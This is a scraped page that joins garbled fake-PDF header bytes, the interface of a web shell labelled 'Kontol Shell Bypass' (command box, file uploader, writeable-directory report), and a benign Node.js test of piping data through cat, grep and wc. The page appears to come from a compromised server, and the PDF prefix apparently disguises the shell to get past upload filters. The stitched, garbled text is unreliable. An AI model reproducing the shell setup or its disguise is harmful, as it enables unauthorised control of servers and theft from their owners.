%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/self/root/home/ubuntu/node-v16.18.1/test/parallel/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/self/root/home/ubuntu/node-v16.18.1/test/parallel/test-child-process-pipe-dataflow.js
'use strict';
const common = require('../common');
const assert = require('assert');
const path = require('path');
const fs = require('fs');
const spawn = require('child_process').spawn;
const tmpdir = require('../common/tmpdir');

let cat, grep, wc;

const KB = 1024;
const MB = KB * KB;


// Make sure process chaining allows desired data flow:
// check cat <file> | grep 'x' | wc -c === 1MB
// This helps to make sure no data is lost between pipes.

{
  tmpdir.refresh();
  const file = path.resolve(tmpdir.path, 'data.txt');
  const buf = Buffer.alloc(MB).fill('x');

  // Most OS commands that deal with data, attach special meanings to new line -
  // for example, line buffering. So cut the buffer into lines at some points,
  // forcing data flow to be split in the stream. Do not use os.EOL for \n as
  // that is 2 characters on Windows and is sometimes converted to 1 character
  // which causes the test to fail.
  for (let i = 1; i < KB; i++)
    buf.write('\n', i * KB);
  fs.writeFileSync(file, buf.toString());

  cat = spawn('cat', [file]);
  grep = spawn('grep', ['x'], { stdio: [cat.stdout, 'pipe', 'pipe'] });
  wc = spawn('wc', ['-c'], { stdio: [grep.stdout, 'pipe', 'pipe'] });

  // Extra checks: We never try to start reading data ourselves.
  cat.stdout._handle.readStart = common.mustNotCall();
  grep.stdout._handle.readStart = common.mustNotCall();

  // Keep an array of error codes and assert on them during process exit. This
  // is because stdio can still be open when a child process exits, and we don't
  // want to lose information about what caused the error.
  const errors = [];
  process.on('exit', () => {
    assert.deepStrictEqual(errors, []);
  });

  [cat, grep, wc].forEach((child, index) => {
    const errorHandler = (thing, type) => {
      // Don't want to assert here, as we might miss error code info.
      console.error(`unexpected ${type} from child #${index}:\n${thing}`);
    };

    child.stderr.on('data', (d) => { errorHandler(d, 'data'); });
    child.on('error', (err) => { errorHandler(err, 'error'); });
    child.on('exit', common.mustCall((code) => {
      if (code !== 0) {
        errors.push(`child ${index} exited with code ${code}`);
      }
    }));
  });

  let wcBuf = '';
  wc.stdout.on('data', common.mustCall((data) => {
    wcBuf += data;
  }));

  process.on('exit', () => {
    // Grep always adds one extra byte at the end.
    assert.strictEqual(wcBuf.trim(), (MB + 1).toString());
  });
}

Kontol Shell Bypass